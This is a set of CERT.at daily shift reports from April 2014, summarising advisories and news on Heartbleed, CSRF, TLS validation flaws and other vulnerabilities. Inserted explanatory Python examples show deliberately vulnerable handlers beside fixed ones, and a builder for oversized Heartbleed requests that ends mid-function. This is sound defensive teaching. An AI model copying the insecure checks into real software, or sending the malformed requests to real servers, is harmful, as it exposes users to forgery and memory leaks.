---------------------------------------------
A problem has been found in Java's TLS library which under certain circumstances allows connections to be decrypted. It is a revival of an attack that has been known since 1998. (Java, Technology)
---------------------------------------------
http://www.golem.de/news/bleichenbacher-angriff-tls-probleme-in-java-1404-1…
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 15-04-2014 18:00 − Wednesday 16-04-2014 18:00
Handler: Alexander Riepl
Co-Handler: Robert Waldner
*** Phishing mail: BSI warns of BSI warning ***
---------------------------------------------
The BSI's regular warnings about hacked online accounts have apparently inspired criminals to launch a phishing attack. The mail speaks of "suspicious activities" and "legal action". (Phishing, Internet)
---------------------------------------------
http://www.golem.de/news/phishing-mail-bsi-warnt-vor-bsi-warnung-1404-10589…
*** RSA BSAFE Micro Edition Suite security bypass ***
---------------------------------------------
RSA BSAFE Micro Edition Suite (MES) could allow a remote attacker to bypass security restrictions, caused by an error within the certificate chain processing logic. An attacker could exploit this vulnerability to create an improperly authenticated SSL connection.
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/92408
*** Chef Multiple Vulnerabilities ***
---------------------------------------------
Chef Software has acknowledged multiple security issues and vulnerabilities in Chef, which can be exploited by malicious people to conduct spoofing and cross-site scripting attacks, bypass certain security restrictions, disclose potentially sensitive information, cause a DoS (Denial of Service), and compromise a vulnerable system.
---------------------------------------------
https://secunia.com/advisories/57836
*** WordPress Twitget Plugin Cross-Site Request Forgery Vulnerability ***
---------------------------------------------
dxwsecurity has reported a vulnerability in the Twitget plugin for WordPress, which can be exploited by malicious people to conduct cross-site request forgery attacks.
The application allows users to perform certain actions via HTTP requests without performing proper validity checks to verify the requests. This can be exploited to e.g. change plugin configuration settings when a logged-in administrative user visits a specially crafted web page.
---------------------------------------------
https://secunia.com/advisories/57892
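The advisory's mechanism, a settings-changing request that is honoured because the browser attaches the administrator's session cookie to it, is easiest to see with the two handlers side by side. The following is an added Python illustration, not code from the Twitget plugin or from WordPress (which provides nonce functions for this purpose in PHP); the session, settings and forged form are constructed. The hardened handler requires a token that is bound to the victim's session and to the specific action, which an attacker's page cannot read, and compares it in constant time.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret for the example; a real deployment loads it
# from configuration rather than generating it per process.
SERVER_KEY = secrets.token_bytes(32)


def csrf_token(session_id, action):
    """Token bound to one session and one action, so a token captured from one
    form cannot be replayed against another form or another user."""
    msg = session_id.encode() + b"\0" + action.encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def _apply(form, settings):
    new = dict(settings)
    new.update({k: v for k, v in form.items() if k in settings})
    return new


def update_settings_vulnerable(session, form, settings):
    """Checks only that an admin session is present. The browser attaches that
    session cookie to a cross-site POST automatically, so a page the admin merely
    visits can submit this form on their behalf."""
    if not session.get("is_admin"):
        return settings, "forbidden"
    return _apply(form, settings), "updated"


def update_settings(session, form, settings):
    """Same handler with an anti-CSRF token. The attacker's page cannot read the
    admin's token (same-origin policy), so the forged request is rejected."""
    if not session.get("is_admin"):
        return settings, "forbidden"
    expected = csrf_token(session["id"], "plugin_settings")
    supplied = form.get("_token", "")
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return settings, "csrf_rejected"
    return _apply(form, settings), "updated"


# Constructed sample data
SETTINGS = {"twitter_user": "corp_account", "cache_seconds": "300"}
ADMIN = {"id": "sess-7f3a", "is_admin": True}
FORGED = {"twitter_user": "attacker_feed"}   # what a hidden form on a malicious page posts

if __name__ == "__main__":
    print(update_settings_vulnerable(ADMIN, FORGED, SETTINGS))   # settings changed
    print(update_settings(ADMIN, FORGED, SETTINGS))              # csrf_rejected
    legit = dict(FORGED, _token=csrf_token(ADMIN["id"], "plugin_settings"))
    print(update_settings(ADMIN, legit, SETTINGS))               # updated, token present
```

The token must be emitted into the plugin's own settings form (a hidden field) and never placed in a URL that could leak through the Referer header; binding it to the action name means a token for one form does not authorise another.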
*** Critical Patch Update - April 2014 ***
---------------------------------------------
Security vulnerabilities addressed by this Critical Patch Update affect the products listed in the categories below. The product area of the patches for the listed versions is shown in the Patch Availability column corresponding to the specified Products and Versions column.
---------------------------------------------
http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html
*** Innominate mGuard OpenSSL HeartBleed Vulnerability ***
---------------------------------------------
OVERVIEW: Researcher Bob Radvanovsky of Infracritical has notified NCCIC/ICS-CERT that Innominate has released a new firmware version that mitigates the OpenSSL Heartbleed vulnerability in the mGuard products. This vulnerability could be exploited remotely. Exploits that target the OpenSSL Heartbleed vulnerability are known to be publicly available.
AFFECTED PRODUCTS: The following Innominate mGuard versions are affected:
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-105-02
*** Siemens Industrial Products OpenSSL HeartBleed Vulnerability ***
---------------------------------------------
OVERVIEW: Siemens reported to NCCIC/ICS-CERT a list of products affected by the OpenSSL vulnerability (known as "Heartbleed"). Joel Langill of Infrastructure Defense Security Services reported to ICS-CERT and Siemens the OpenSSL vulnerability affecting the S7-1500. Siemens has produced an update and Security Advisory (SSA-635659) that mitigates this vulnerability in eLAN and is currently working on updates for the other affected products.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-105-03
*** Looking for malicious traffic in electrical SCADA networks - part 1, (Tue, Apr 15th) ***
---------------------------------------------
When infosec people perform intrusion detection, they usually look for attacks like port scans, buffer overflows and specific exploit signatures. For example, remember the OpenSSL Heartbleed vulnerability?
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17967&rss
*** New Feature: Monitoring Certification Revocation Lists https://isc.sans.edu/crls.html, (Wed, Apr 16th) ***
---------------------------------------------
Certificate Revocation Lists (“CRLs”) are used to track revoked certificates. Your browser will download these lists to verify if a certificate presented by a web site has been revoked. The graph above shows how many certificates were revoked each day by the different CRLs we are tracking.
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17969&rss
*** Adobe Flash ExternalInterface Use-After-Free ***
---------------------------------------------
VUPEN Vulnerability Research Team discovered a critical vulnerability in Adobe Flash.
The vulnerability is caused by a use-after-free error when interacting with the "ExternalInterface" class from the browser, which could be exploited to achieve code execution via a malicious web page.
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014040102
*** Netgear N600 Password Disclosure / Account Reset ***
---------------------------------------------
While I was lurking around the Netgear firmware today, I came across various tweaks and other things and was able to find a password disclosure and a file upload vulnerability which could compromise the entire router. As of now there is no patch from the vendor.
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014040101
*** Apache Syncope 1.0.8 / 1.1.6 Code Execution ***
---------------------------------------------
In the various places in which Apache Commons JEXL expressions are allowed (derived schema definition, user / role templates, account links of resource mappings), a malicious administrator can inject Java code that can be executed remotely by the JEE container running the Apache Syncope core.
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014040106
*** Bugtraq: CVE-2014-2735 - WinSCP: missing X.509 validation ***
---------------------------------------------
A user cannot recognise an easy-to-perform man-in-the-middle attack, because the client does not validate the "Common Name" of the server's X.509 certificate. In a network environment that is not trustworthy, such as a Wi-Fi network, the server's identity cannot be trusted when using FTP with AUTH TLS in WinSCP.
---------------------------------------------
http://www.securityfocus.com/archive/1/531847
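What the WinSCP advisory describes is a client that verifies the certificate chain but never asks whether the certificate was issued for the host it intended to reach, so any validly issued certificate, including the attacker's own, is accepted. The following is an added Python illustration, not WinSCP code: it implements the name check a client has to perform (subjectAltName dNSName entries first, subject CN only as a fallback, single left-most wildcard label) against certificates in the dict layout that Python's ssl.SSLSocket.getpeercert() returns, and puts the chain-only check beside the correct one. The three certificates are constructed.

```python
def _dns_name_matches(pattern, hostname):
    """RFC 6125-style comparison of one certificate name against the host the
    client connected to. Case-insensitive; a wildcard is accepted only as the
    entire left-most label and only when at least two labels follow it, so
    '*.example.org' matches 'ftp.example.org' but '*.org' matches nothing."""
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if pattern == hostname:
        return True
    p_labels, h_labels = pattern.split("."), hostname.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3 or len(p_labels) != len(h_labels):
        return False
    return p_labels[1:] == h_labels[1:]


def names_in_cert(cert):
    """DNS names a certificate is valid for. subjectAltName dNSName entries win;
    the subject commonName is consulted only when the certificate has none."""
    sans = [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    if sans:
        return sans
    for rdn in cert.get("subject", ()):
        for key, value in rdn:
            if key == "commonName":
                return [value]
    return []


def hostname_matches(cert, hostname):
    return any(_dns_name_matches(name, hostname) for name in names_in_cert(cert))


def accept_peer_chain_only(cert, hostname, chain_valid):
    """The flawed check the advisory describes: any certificate that chains to a
    trusted CA is accepted, whatever name it was issued for."""
    return chain_valid


def accept_peer(cert, hostname, chain_valid):
    """Correct check: the chain must validate AND the certificate must name the
    host we meant to reach."""
    return chain_valid and hostname_matches(cert, hostname)


# Constructed certificates (only the fields that matter here)
LEGIT_CERT = {
    "subject": ((("commonName", "ftp.example.org"),),),
    "subjectAltName": (("DNS", "ftp.example.org"), ("DNS", "*.example.org")),
}
ROGUE_CERT = {  # properly CA-issued, but for a name the attacker controls
    "subject": ((("commonName", "files.example.net"),),),
    "subjectAltName": (("DNS", "files.example.net"),),
}
CN_ONLY_CERT = {"subject": ((("commonName", "legacy.example.org"),),)}

if __name__ == "__main__":
    host = "ftp.example.org"
    print("chain-only check, rogue cert:", accept_peer_chain_only(ROGUE_CERT, host, True))
    print("full check, rogue cert:      ", accept_peer(ROGUE_CERT, host, True))
    print("full check, legitimate cert: ", accept_peer(LEGIT_CERT, host, True))
```

With Python's own ssl module the equivalent of the corrected check is ssl.create_default_context(), which sets check_hostname=True together with verify_mode=CERT_REQUIRED; setting check_hostname=False reproduces exactly the weakness in the advisory.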
*** Qemu: out of bounds buffer access, guest triggerable via IDE SMART ***
---------------------------------------------
An out-of-bounds memory access flaw was found in Qemu's IDE device model: a 4-byte buffer overwrite that corrupts Qemu's memory while IDE SMART commands are executed. A guest user could use this flaw to corrupt the Qemu process's memory on the host.
---------------------------------------------
http://seclists.org/oss-sec/2014/q2/116
*** Background: why we need forward secrecy ***
---------------------------------------------
The SSL meltdown shows emphatically that forward secrecy is not an exotic feature for the paranoid. Rather, it is the only thing still protecting us from complete blanket surveillance of all communication by the intelligence agencies.
---------------------------------------------
http://www.heise.de/security/artikel/Warum-wir-Forward-Secrecy-brauchen-217…
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 14-04-2014 18:00 − Tuesday 15-04-2014 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** Barracuda Multiple Products OpenSSL TLS/DTLS Heartbeat Two Information Disclosure Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/57869
*** DSA-2903 strongswan ***
---------------------------------------------
http://www.debian.org/security/2014/dsa-2903
*** Occupy Your Icons Silently on Android ***
---------------------------------------------
FireEye mobile security researchers have discovered a new Android security issue: a malicious app with normal protection level permissions can probe icons on Android home screen and modify them to point to phishing ..
---------------------------------------------
http://www.fireeye.com/blog/uncategorized/2014/04/occupy_your_icons_silentl…
*** From the Trenches: AV Evasion With Dynamic Payload Generation ***
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2014/04/14/from-the-…
*** Critical Patch Update - April 2014 - Pre-Release Announcement ***
---------------------------------------------
http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html
*** First Phase of TrueCrypt Audit Turns Up No Backdoors ***
---------------------------------------------
An initial audit of the popular open source encryption software TrueCrypt turned up fewer than a dozen vulnerabilities, none of which so far point toward a backdoor surreptitiously inserted into the codebase. A report on the first phase of the audit was released ..
---------------------------------------------
http://beta.slashdot.org/story/200749
*** Microsoft Confirms It Is Dropping Windows 8.1 Support ***
---------------------------------------------
Microsoft TechNet blog makes clear that Windows 8.1 will not be patched, and that users must get Windows 8.1 Update if they want security patches, InfoWorld's Woody Leonhard reports. In what is surely the most customer-antagonistic move of the new Windows regime, Steve Thomas at Microsoft posted a TechNet article on Saturday stating categorically that Microsoft will ..
---------------------------------------------
http://tech.slashdot.org/story/14/04/15/0053213/microsoft-confirms-it-is-dr…
*** VMware reveals 27-patch Heartbleed fix plan ***
---------------------------------------------
Go buy your vSysadmins a big choccy egg: their Easter is in peril. VMware has confirmed that 27 of its products need patches for the Heartbleed bug.
---------------------------------------------
http://www.theregister.co.uk/2014/04/15/vmware_reveals_27patch_heartbleed_f…
*** Cyberwar documentary "netwars / out of CTRL": web documentary at heise ***
---------------------------------------------
In parallel to the Arte documentary, heise online presents the first part of the innovative multimedia documentary on cyberwar. You decide for yourself whether you would rather see details on Stuxnet or a commentary by star hacker FX.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Cyberwar-Doku-netwars-out-of-CTRL-We…
*** Samsung Galaxy S5: fingerprint sensor already hacked too ***
---------------------------------------------
Using a fake fingertip developed for the iPhone 5S, Ben Schlabs tricked the lock of the new Samsung flagship. He was then even able to transfer money with it.
---------------------------------------------
http://www.heise.de/security/meldung/Samsung-Galaxy-S5-Fingerabdrucksensor-…
*** SSA-364879 (Last Update 2014-04-15): Vulnerabilities in SINEMA Server ***
---------------------------------------------
https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit…
*** SSA-654382 (Last Update 2014-04-15): Vulnerabilities in SIMATIC S7-1200 CPU ***
---------------------------------------------
https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit…
*** Akamai Withdraws Proposed Heartbleed Patch ***
---------------------------------------------
As researchers demonstrate OpenSSL bug exploits that retrieve private keys, Akamai rescinds a patch suggestion for the SSL/TLS library after a security researcher punches holes in it.
---------------------------------------------
http://www.darkreading.com/application-security/akamai-withdraws-proposed-h…
*** (ISC)² launches cyber forensics credential in Europe ***
---------------------------------------------
Information and software security professional body (ISC)² has announced the availability of its Certified Cyber Forensics Professional certification in Europe. Registration for CCFP-EU is now open, with the first exam available on 30 April 2014 at Pearson VUE test centres across the region. The German translation of the exam is to be available from 15 June 2014.
---------------------------------------------
http://www.computerweekly.com/news/2240218864/ISC2-launches-cyber-forensics…
*** BSI warns of "BSI" mails ***
---------------------------------------------
Fraudsters are abusing the BSI's name for a phishing campaign claiming that the recipient has been caught in "illegal activities". The BSI advises not to open the attachment under any circumstances.
---------------------------------------------
http://www.heise.de/security/meldung/BSI-warnt-vor-BSI-Mails-2170549.html
*** Hardware Giant LaCie Acknowledges Year-Long Credit Card Breach ***
---------------------------------------------
Computer hard drive maker LaCie has acknowledged that a hacker break-in at its online store exposed credit card numbers and contact information on customers for the better part of the past ..
---------------------------------------------
http://krebsonsecurity.com/2014/04/hardware-giant-lacie-acknowledges-year-l…
*** Synology cleans up after Heartbleed: password change and updates ***
---------------------------------------------
After the Heartbleed hole made it possible to access e-mail addresses and passwords of Synology users, the vendor is now urging its customers to change their passwords. Security updates for the Synology NAS devices are also available.
---------------------------------------------
http://www.heise.de/security/meldung/Synology-raeumt-nach-Heartbleed-auf-Pa…
*** Exploiting CSRF under NoScript Conditions ***
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2014/04/15/exploitin…
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 11-04-2014 18:00 − Monday 14-04-2014 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** Heartbleed FAQ ***
---------------------------------------------
Heartbleed FAQ, 11 April 2014. We have now also published our own version of an FAQ on "Heartbleed". This document is not a final report but a snapshot that will be updated as new data comes in. For instance, we are currently working on measuring the status in Austria more precisely. Author: Otmar Lendl
---------------------------------------------
http://www.cert.at/services/blog/20140411232912-1127.html
*** Heartbleed: extracting keys is easier than thought ***
---------------------------------------------
Two people have succeeded in extracting private keys from an nginx test server using the Heartbleed bug. The server belongs to Cloudflare, which had set up a challenge intending to establish that extracting private keys is impossible. (Server, OpenSSL)
---------------------------------------------
http://www.golem.de/news/heartbleed-keys-auslesen-ist-einfacher-als-gedacht…
*** NSA claims not to have known about the "Heartbleed" hole ***
---------------------------------------------
In a report, the news agency Bloomberg claimed that the OpenSSL hole had been known to the NSA for two years. The US authorities, however, quickly rejected this.
---------------------------------------------
http://www.heise.de/security/meldung/NSA-will-nichts-von-Heartbleed-Luecke-…
*** Heartbleed shows: Google must get Android updates under control ***
---------------------------------------------
Only one almost two-year-old version is affected, but many millions of devices are at risk - updates unlikely
---------------------------------------------
http://derstandard.at/1397301984464
*** "Heartbleed": thousands of Austrian websites still affected ***
---------------------------------------------
The security hole is found on web servers of public institutions - schools and municipalities affected
---------------------------------------------
http://derstandard.at/1397302008116
*** Identity theft: 7,500 domain operators in Austria affected ***
---------------------------------------------
The Federal Criminal Police Office (Bundeskriminalamt) is now informing all operators of affected domains
---------------------------------------------
http://derstandard.at/1397302034346
*** OpenSSL use-after-free race condition read buffer ***
---------------------------------------------
Topic: OpenSSL use-after-free race condition read buffer
Risk: High
Text: About two days ago, I was poking around with OpenSSL to find a way to mitigate Heartbleed. I soon discovered that in its defaul...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014040079
*** Citrix VDI-in-a-Box Discloses Administrator Password to Local Users ***
---------------------------------------------
http://www.securitytracker.com/id/1030068
*** Arbitrary Code Execution Bug in Android Reader ***
---------------------------------------------
A security vulnerability in Adobe Reader for Android could give an attacker the ability to execute arbitrary code.
---------------------------------------------
http://threatpost.com/arbitrary-code-execution-bug-in-android-reader/105421
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 10-04-2014 18:00 − Friday 11-04-2014 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** Heartbleed vendor informations / statistics ***
---------------------------------------------
https://isc.sans.edu/diary/Heartbleed+vendor+notifications/17929
https://www.cert.fi/en/reports/2014/vulnerability788210.html
http://securityaffairs.co/wordpress/23878/intelligence/statistics-impact-he…
*** Hacked online accounts: more than ten million queries of the security check ***
---------------------------------------------
The BSI's second security check for hacked online accounts is also meeting with great interest. A security block imposed by GMX and web.de, however, continues to cause confusion.
---------------------------------------------
http://www.golem.de/news/gehackte-online-konten-mehr-als-zehn-millionen-abr…
*** The Heartbleed Hit List: The Passwords You Need to Change Right Now ***
---------------------------------------------
... it hasn't always been clear which sites have been affected. Mashable reached out to various companies included on a long list of websites that could potentially have the flaw. Below, we've rounded up the responses from some of the most popular social, email, banking and commerce sites on the web.
---------------------------------------------
http://mashable.com/2014/04/09/heartbleed-bug-websites-affected/
*** Heartbleed Vulnerability Affects 5% of Select Top Level Domains from Top 1M ***
---------------------------------------------
In trying to gauge the impact of the Heartbleed vulnerability, we proceeded to scan the Top Level Domain (TLD) names of certain countries extracted from the top 1,000,000 domains by Alexa. We then separated out the sites which use SSL and further categorized those as "vulnerable" or "safe". The data we were able to...
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/heartbleed-vulne…
*** Espionage botnet already exploited the Heartbleed hole months ago ***
---------------------------------------------
Already in November, a botnet built for espionage apparently attempted to siphon off data through the OpenSSL hole - possibly on behalf of an intelligence agency. The good news: the number of still-vulnerable servers is declining.
---------------------------------------------
http://www.heise.de/security/meldung/Spionage-Botnet-nutzte-Heartbleed-Luec…
*** Heartbleed: Apple users are not affected ***
---------------------------------------------
Neither Mac OS X, iOS nor Apple services such as iCloud are affected by the Heartbleed vulnerability, because Apple does not use OpenSSL. Some apps, however, do use the crypto library. (Apple, server applications)
---------------------------------------------
http://www.golem.de/news/heartbleed-apple-nutzer-sind-nicht-betroffen-1404-…
*** Heartbleed Explanation ***
---------------------------------------------
http://xkcd.com/1354/
*** Critical Update for JetPack WordPress Plugin ***
---------------------------------------------
The Jetpack team just released a critical security update to fix a security vulnerability in the Jetpack WordPress plugin. The vulnerability allows an attacker to bypass the site's access control and publish posts on the site. All versions of Jetpack since October 2012 (Jetpack 1.9) are vulnerable, and all users should update to version 2.9.3.
---------------------------------------------
http://blog.sucuri.net/2014/04/critical-update-for-jetpack-wordpress-plugin…
*** Security Updates for VMware vSphere ***
---------------------------------------------
http://www.vmware.com/security/advisories/VMSA-2014-0002.html
http://www.vmware.com/security/advisories/VMSA-2014-0003.html
*** IBM SPSS Analytic Server Discloses Passwords to Remote Authenticated Users ***
---------------------------------------------
http://www.securitytracker.com/id/1030051
*** [2014-04-11] Multiple vulnerabilities in Plex Media Server ***
---------------------------------------------
Plex Media Server contains several vulnerabilities that allow an attacker to intercept traffic between Plex Media Server and clients in plaintext. Furthermore, Cross Site Request Forgery (CSRF) vulnerabilities allow an attacker to execute privileged commands in the context of Plex Media Server.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 09-04-2014 18:00 − Thursday 10-04-2014 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** Background: passwords at risk - what now? ***
---------------------------------------------
Heartbleed has, in theory, once again put many millions of passwords at risk. Security experts advise changing all of them. heise Security editor-in-chief Jürgen Schmidt sees it differently.
---------------------------------------------
http://www.heise.de/security/artikel/Passwoerter-in-Gefahr-was-nun-2167584.…
*** Heartbleed: 600,000 servers still unprotected ***
---------------------------------------------
The Heartbleed vulnerability keeps widening. The flaw may already have been exploited for months.
---------------------------------------------
http://futurezone.at/digital-life/heartbleed-600-000-server-immer-noch-unge…
*** Vulnerability: companies may be liable for damage caused by Heartbleed ***
---------------------------------------------
The Heartbleed bug is considered one of the most serious security holes of all time. Millions of SSL-secured websites were affected, and the first cases of abuse have become known. Can companies and admins who have not fixed the bug be held liable for damages? Golem.de asked.
---------------------------------------------
http://www.golem.de/news/sicherheitsluecke-unternehmen-koennen-fuer-schaede…
*** Smartphones (almost) unaffected by the SSL disaster ***
---------------------------------------------
None of the major smartphone platforms uses one of the Heartbleed-vulnerable OpenSSL libraries in its current version. Only Android users running a somewhat older version need an update.
---------------------------------------------
http://www.heise.de/security/meldung/Smartphones-vom-SSL-GAU-fast-nicht-bet…
*** OpenSSL bug: traces of Heartbleed as early as November 2013 ***
---------------------------------------------
A system administrator claims to have found exploit code for the Heartbleed bug in a log file from November of last year. The EFF is calling on other administrators to investigate.
---------------------------------------------
http://www.golem.de/news/openssl-bug-spuren-von-heartbleed-schon-im-novembe…
*** Crime: the underground is digital ***
---------------------------------------------
How can crime 2.0 be fought jointly? The answer at the congress of the Verband für Sicherheitstechnik: integration, closer cooperation, collaboration, and hoping for active citizens and data retention.
---------------------------------------------
http://www.heise.de/security/meldung/Kriminalitaet-Der-Untergrund-ist-digit…
*** Windows XP: reluctant upgraders in a patch dilemma ***
---------------------------------------------
The official end of XP support does not mean that no more patches may turn up on the net. But installing such files could become dangerous for users.
---------------------------------------------
http://www.golem.de/news/windows-xp-wechselmuffel-im-patch-dilemma-1404-105…
*** "Heartbleed" hole: use the opportunity ***
---------------------------------------------
As F-Secure writes in a blog post, administrators should use the cleanup in the wake of the "Heartbleed" hole to bring the corresponding configurations up to date as well. F-Secure recommends the OWASP Transport Layer Protection Cheat Sheet for this; we second that and add the Better Crypto Hardening Paper (PDF) from bettercrypto.org.
---------------------------------------------
http://www.cert.at/services/blog/20140409164644-1090.html
*** JSA10623 - 2014-04 Out of Cycle Security Bulletin: Multiple products affected by OpenSSL "Heartbleed" issue (CVE-2014-0160) ***
---------------------------------------------
http://kb.juniper.net/index?page=content&id=JSA10623&actp=RSS
*** JSA10618 - 2014-04 Security Bulletin: Junos: Kernel panic processing high rate of crafted IGMP packets (CVE-2014-0614) ***
---------------------------------------------
http://kb.juniper.net/index?page=content&id=JSA10618&actp=RSS
*** OpenVPN Access Server OpenSSL TLS Heartbeat Information Disclosure Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/57755
*** Multiple Vulnerabilities in Cisco ASA Software ***
---------------------------------------------
Cisco Adaptive Security Appliance (ASA) Software is affected by the following vulnerabilities:
Cisco ASA ASDM Privilege Escalation Vulnerability
Cisco ASA SSL VPN Privilege Escalation Vulnerability
Cisco ASA SSL VPN Authentication Bypass Vulnerability
Cisco ASA SIP Denial of Service Vulnerability
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 08-04-2014 18:00 − Wednesday 09-04-2014 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Security updates available for Adobe Flash Player (APSB14-09) ***
---------------------------------------------
A Security Bulletin (APSB14-09) has been published regarding security updates for Adobe Flash Player. These updates address critical vulnerabilities, and Adobe recommends users update their product installations to the latest versions using the instructions referenced in the security bulletin.
---------------------------------------------
http://blogs.adobe.com/psirt/?p=1081
*** Assessing risk for the April 2014 security updates ***
---------------------------------------------
Today we released four security bulletins addressing 11 unique CVEs. Two bulletins have a maximum severity rating of Critical while the other two have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.
---------------------------------------------
http://blogs.technet.com/b/srd/archive/2014/04/08/assessing-risk-for-the-ap…
*** Summary for April 2014 - Version: 1.0 ***
---------------------------------------------
* Vulnerabilities in Microsoft Word and Office Web Apps Could Allow Remote Code Execution
* Cumulative Security Update for Internet Explorer
* Vulnerability in Windows File Handling Component Could Allow Remote Code Execution
* Vulnerability in Microsoft Publisher Could Allow Remote Code Execution
---------------------------------------------
http://technet.microsoft.com/en-ca/security/bulletin/ms14-apr
*** WordPress 3.8.2 Security Release ***
---------------------------------------------
WordPress 3.8.2 is now available. This is an important security release for all previous versions and we strongly encourage you to update your sites immediately.
This release fixes a weakness that could let an attacker force their way into your site by forging authentication cookies.
---------------------------------------------
http://wordpress.org/news/2014/04/wordpress-3-8-2/
*** OSISoft PI Interface for DNP3 Improper Input Validation ***
---------------------------------------------
OVERVIEW: Adam Crain of Automatak and Chris Sistrunk, Sr. Consultant for Mandiant, have identified an improper input validation vulnerability in the OSIsoft PI Interface for DNP3 product. OSIsoft has produced an update that mitigates this vulnerability. OSIsoft and Automatak have tested the new version to validate that it resolves the vulnerability. This vulnerability can be remotely exploited.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-098-01
*** WellinTech KingSCADA Stack-Based Buffer Overflow ***
---------------------------------------------
An anonymous researcher working with HP's Zero Day Initiative has identified a stack-based buffer overflow in WellinTech KingSCADA. WellinTech has produced a patch that mitigates this vulnerability. This vulnerability could be exploited remotely.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-098-02
*** OpenSSL Heartbeat Extension Vulnerability in Multiple Cisco Products ***
---------------------------------------------
Multiple Cisco products incorporate a version of the OpenSSL package affected by a vulnerability that could allow an unauthenticated, remote attacker to retrieve memory in chunks of 64 kilobytes from a connected client or server.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** The April 2014 Security Updates ***
---------------------------------------------
Today, we release four bulletins to address 11 CVEs in Microsoft Windows, Internet Explorer and Microsoft Office.
---------------------------------------------
http://blogs.technet.com/b/msrc/archive/2014/04/08/the-april-2014-security-…
*** Heartbleed SSL disaster: the country needs new certificates ***
---------------------------------------------
A simple update is not enough: after the OpenSSL hole, server operators must replace their certificates, with a newly generated private key, since the old key may have been read out through the bug. Some CAs do this for free; other certificate vendors and hosters leave it at warnings.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Heartbleed-SSL-GAU-Neue-Zertifikate-…
*** Juniper SSL VPN (IVEOS) OpenSSL TLS Heartbeat Information Disclosure Vulnerability ***
---------------------------------------------
Juniper has acknowledged a vulnerability in Juniper SSL VPN (IVEOS), which can be exploited by malicious people to disclose potentially sensitive information.
---------------------------------------------
https://secunia.com/advisories/57758
*** Bugtraq: CVE-2014-0160 mitigation using iptables ***
---------------------------------------------
Following up on the CVE-2014-0160 vulnerability (Heartbleed), we've created some iptables rules to block all heartbeat queries using the very powerful u32 module.
The rules allow you to mitigate systems that can't yet be patched by blocking ALL the heartbeat handshakes. We also like the capability to log external scanners :)
---------------------------------------------
http://www.securityfocus.com/archive/1/531779
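The Cisco advisory above and this Bugtraq post describe the same mechanism from two sides: the 64-kilobyte memory reads come from a HeartbeatRequest whose payload_length field is trusted without being checked against the record that actually arrived, and a u32 rule that blocks heartbeat queries has to key on the heartbeat content type (0x18) at the start of the TLS record. The Python model below is an added example, not code from OpenSSL, Cisco or the Bugtraq post: it builds a heartbeat record, runs it through a vulnerable and a fixed handler over a constructed "heap" buffer, and applies the same content-type test a blocking rule relies on. The constants follow RFC 6520 and the TLS record header; the simulated heap content is made up.

```python
"""TLS heartbeat (RFC 6520) handling: the Heartbleed over-read and its fix.

Added example, not code from OpenSSL, Cisco or the Bugtraq iptables post.
It models a peer's heartbeat handling in plain Python over a constructed
'heap' buffer; nothing here touches real memory or a real socket.
"""
import struct

TLS_HEARTBEAT = 0x18        # TLS record content type for heartbeat messages
HEARTBEAT_REQUEST = 1       # HeartbeatMessageType values from RFC 6520
HEARTBEAT_RESPONSE = 2
MIN_PADDING = 16            # RFC 6520: at least 16 bytes of random padding
HEADER = 1 + 2              # type byte + payload_length field


def build_heartbeat_request(payload: bytes, claimed_length: int, version=(3, 1)) -> bytes:
    """Build a TLS record carrying a HeartbeatRequest.

    claimed_length goes into the payload_length field. A benign client
    passes len(payload); the attack passes a value far larger than the
    payload it actually sends (up to 65535, the 64 KB of the advisory).
    """
    body = struct.pack("!BH", HEARTBEAT_REQUEST, claimed_length) + payload + b"\x00" * MIN_PADDING
    return struct.pack("!BBBH", TLS_HEARTBEAT, version[0], version[1], len(body)) + body


def is_heartbeat_record(tcp_payload: bytes) -> bool:
    """The test a blocking rule relies on: a TLS record starting with the
    heartbeat content type (0x18) and a TLS/SSLv3 major version byte (0x03).
    Record headers stay in cleartext even after the handshake."""
    return len(tcp_payload) >= 2 and tcp_payload[0] == TLS_HEARTBEAT and tcp_payload[1] == 0x03


def split_record(record: bytes):
    """Return (content_type, record body) from the 5-byte TLS record header."""
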